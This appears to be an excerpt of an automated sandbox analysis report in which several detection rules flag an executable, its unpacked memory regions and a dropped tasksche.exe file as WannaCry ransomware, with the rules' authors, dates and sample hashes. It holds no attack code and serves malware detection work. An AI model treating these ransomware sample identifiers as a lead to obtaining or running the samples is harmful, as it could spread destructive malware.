                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: stN592INV6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: stN592INV6.exe, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: stN592INV6.exe, type: SAMPLEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: stN592INV6.exe, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: stN592INV6.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.1fe70a4.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
                Source: 1.2.stN592INV6.exe.1fdc084.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.25078e8.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
                Source: 1.2.stN592INV6.exe.24fc8c8.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPEMatched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
                Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
